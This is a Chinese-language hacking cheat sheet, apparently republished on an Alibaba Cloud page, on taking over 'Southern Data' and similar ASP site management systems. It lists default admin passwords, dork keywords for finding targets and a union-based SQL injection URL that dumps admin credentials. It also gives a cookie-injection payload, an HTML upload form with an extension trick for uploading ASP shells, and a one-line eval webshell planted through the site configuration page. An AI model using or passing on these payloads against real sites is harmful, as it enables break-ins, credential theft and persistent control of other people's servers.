南方資料管理系統拿shell(一個小小的總結)

最後更新：2018-12-07 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

預設：

admin admin
admin admin888
'or'='or'
預設資料庫Databases/079lidc.mdb

改樣式上傳:http://www.yangtong.com/admin/southidceditor/admin_style.asp

抓包明小子上傳

注:通殺南方資料良精系統網軟天下等

http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='

w78cms網站管理系統
關鍵詞 inurl:ShopMore.asp?id
利用頁面 /admin/ewebeditor/admin 預設帳號密碼 admin 198625

關鍵詞:inurl:alogin.asp
木馬上傳尾碼：asp;.asp.jpg
admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp

1.通過upfile_other.asp漏洞檔案直接取SHELL
直接開啟userreg.asp進行註冊會員,進行登入,(在未退出登入的狀態下)使用本地上傳檔案進行上傳代碼如下:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
}
.tx1 {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
}
</STYLE>

<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0>
<FORM name=form1 action="http://www.target.com/upfile_Other.asp"; method=post
encType=multipart/form-data><INPUT class="tx1" type=file size=30 name=FileName> <INPUT class="tx1" type=file size=30 name=FileName1> <INPUT style="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上傳 name=Submit>
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
將以上代碼儲存為html格式,替換代碼中的網址,第一個框裡選擇圖片檔案,第二個框選擇.cer asa或asp檔案上傳,後面需要加一個空格

2.Sql注入
http://www.target.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
以上代碼直接暴管理員帳號和密碼,取SHELL方法如下:
在網站配置[http://www.target.com/admin/SiteConfig.asp]的著作權資訊裡寫入
"%><%eval(request(chr(35)))%><%'
成功把shell寫入http://www.target.com/inc/config.asp
這裡一句話chr(32)密碼是"#"

3.cookie注入
清空地址欄,利用union語句來注入,提交:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
用刺蝟大哥的cookie注入轉換工具亦可

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More